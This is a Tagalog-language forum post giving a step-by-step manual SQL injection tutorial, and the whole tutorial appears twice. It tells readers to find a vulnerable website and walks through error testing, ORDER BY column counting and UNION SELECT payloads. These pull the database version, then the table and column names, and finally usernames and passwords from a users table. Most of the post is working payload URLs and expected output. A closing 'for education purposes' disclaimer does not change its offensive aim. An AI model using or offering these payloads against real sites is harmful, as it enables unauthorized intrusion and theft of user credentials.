zkrittlez_1337
Forum Veteran
- Joined
- Jul 1, 2016
- Posts
- 877
- Reaction
- 2,052
- Points
- 679
NOTE: Paalala lang, matutong magbasa. Hindi po kasama yung quotation tapos yung parenthesis dito. Basahing maigi. Okay start na tayo.
Una hanap ka ng vulnerable website
Try nateng 'tong isang 'to
EX:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54
Pano malalaman kung vulnerable ang isang website sa Sql Injection?
Lagyan mo ng ( ' ) yung dulo. ( Hindi kasama yung parenthesis. )
Edi ang lalabas:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54'
Hit [Enter] Then may lalabas na ganito:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Okay, pwede ang website para sa test SQLi natin.
Next, hanapin ang tables ng website na target natin.
Delete mo yung ( ' ) at palitan mo ng "order by " (Hindi kasama yung parenthesis.)
tapos lagyan mo ng ( 10-- ) sa dulo. (Hindi kasama yung parenthesis. )
Ganito:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54 order by 10--
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54 order by 20--
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54 order by 30--
Kapag may ' 30 ' in ' order clause' lumabas, bawasan mo ng bawasan hangang mawala yung "order clause"
So ang tamang tables ay 24--
You do not have permission to view the full content of this post. Log in or register now. order by 24--
Next yung "order by " gawin nyong "union select" at lagyan nyo ng ( - ) (Hindi kasama yung parenthesis.) bago yung =58
Ganito
SURIIN NYONG MABUTI.
Ganito kunware.
You do not have permission to view the full content of this post. Log in or register now. union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Hit [Enter] May mababasa kang ganito,
3
13,3 11 117
Yung naka BOLD na number yung lalagyan mo ng " @@version "
Ganito:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=-54 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Hit [Enter] at may lalabas na ganto "5.1.46-log "
NOTE:
Tandaan nyo lagi na pag mas ma baba sa 5.0.0 log kunware 4.45.0- log LIPAT KA NA NG WEBSITE. HINDI PWEDE YANG VERSION NG SITE NA YAN KASE WALANG TABLE SCHEMA.
Next, palitan mo ng " group_concat (table_name) " yung "@@version " tapos sa dulo ng 24-- tanggalin mo na yung ( --
) sa dulo pagkatapos palitan mo ng ganito:
from information_schema.tables wher table_schema=database()--
Ganito lalabas:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=-54 union select 1,2,group_concat (table_name),9,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables wher table_schema=database()--
May mababasa kayong ganito:
cont_lic_lu,content,content_types,countries,documents,fact_page_lu,fastfacts,hpitems,hpslides,itemtypes,languages,lic_holder_lu,lic_partner_lu,licences,links,locations,newsitems,operators,pages,pictures,sections,slides,slideshows, #users
Depende sa website kung ano lalabas. Yung target na tables, yung users tapos yung "group_concat " palitan nyo ng "group_concat (column_name) tapos yung dulo ng "from " delete nyo palitan nyo ng
"from information_schema.columns where table_schema=database ()-- "
Ganito lalabas:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=-54 union select 1,2,group_concat (column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()--
Then finally, hanapin ang Username at Password kung natatandaan nyo pa yung #users yung target nating table dun mang-gagaling yung password and username
Heto na,
Yung (column_name ) palitan ng (username,0x3a,password ) tapos yung dulo ng FROM, DELETE nyo na, iwan mo lang yung FROM at lagay mo sa dulo yung target nating table, ganito yan:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=-54 union select 1,2,group_concat (username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users--
Lagyan mo ng ( -- ) yung dulo ng USERS.
Notes, Warnings & Disclaimer: For Education Purposes, Do It At Your Own Risk!
Una hanap ka ng vulnerable website
Try nateng 'tong isang 'to
EX:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54
Pano malalaman kung vulnerable ang isang website sa Sql Injection?
Lagyan mo ng ( ' ) yung dulo. ( Hindi kasama yung parenthesis. )
Edi ang lalabas:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54'
Hit [Enter] Then may lalabas na ganito:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Okay, pwede ang website para sa test SQLi natin.
Next, hanapin ang tables ng website na target natin.
Delete mo yung ( ' ) at palitan mo ng "order by " (Hindi kasama yung parenthesis.)
tapos lagyan mo ng ( 10-- ) sa dulo. (Hindi kasama yung parenthesis. )
Ganito:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54 order by 10--
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54 order by 20--
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=54 order by 30--
Kapag may ' 30 ' in ' order clause' lumabas, bawasan mo ng bawasan hangang mawala yung "order clause"
So ang tamang tables ay 24--
You do not have permission to view the full content of this post. Log in or register now. order by 24--
Next yung "order by " gawin nyong "union select" at lagyan nyo ng ( - ) (Hindi kasama yung parenthesis.) bago yung =58
Ganito
SURIIN NYONG MABUTI.
Ganito kunware.
You do not have permission to view the full content of this post. Log in or register now. union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Hit [Enter] May mababasa kang ganito,
3
13,3 11 117
Yung naka BOLD na number yung lalagyan mo ng " @@version "
Ganito:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=-54 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Hit [Enter] at may lalabas na ganto "5.1.46-log "
NOTE:
Tandaan nyo lagi na pag mas ma baba sa 5.0.0 log kunware 4.45.0- log LIPAT KA NA NG WEBSITE. HINDI PWEDE YANG VERSION NG SITE NA YAN KASE WALANG TABLE SCHEMA.
Next, palitan mo ng " group_concat (table_name) " yung "@@version " tapos sa dulo ng 24-- tanggalin mo na yung ( --
) sa dulo pagkatapos palitan mo ng ganito:
from information_schema.tables wher table_schema=database()--
Ganito lalabas:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=-54 union select 1,2,group_concat (table_name),9,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables wher table_schema=database()--
May mababasa kayong ganito:
cont_lic_lu,content,content_types,countries,documents,fact_page_lu,fastfacts,hpitems,hpslides,itemtypes,languages,lic_holder_lu,lic_partner_lu,licences,links,locations,newsitems,operators,pages,pictures,sections,slides,slideshows, #users
Depende sa website kung ano lalabas. Yung target na tables, yung users tapos yung "group_concat " palitan nyo ng "group_concat (column_name) tapos yung dulo ng "from " delete nyo palitan nyo ng
"from information_schema.columns where table_schema=database ()-- "
Ganito lalabas:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=-54 union select 1,2,group_concat (column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()--
Then finally, hanapin ang Username at Password kung natatandaan nyo pa yung #users yung target nating table dun mang-gagaling yung password and username
Heto na,
Yung (column_name ) palitan ng (username,0x3a,password ) tapos yung dulo ng FROM, DELETE nyo na, iwan mo lang yung FROM at lagay mo sa dulo yung target nating table, ganito yan:
You do not have permission to view the full content of this post. Log in or register now.
article.php?id=-54 union select 1,2,group_concat (username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users--
Lagyan mo ng ( -- ) yung dulo ng USERS.
Notes, Warnings & Disclaimer: For Education Purposes, Do It At Your Own Risk!
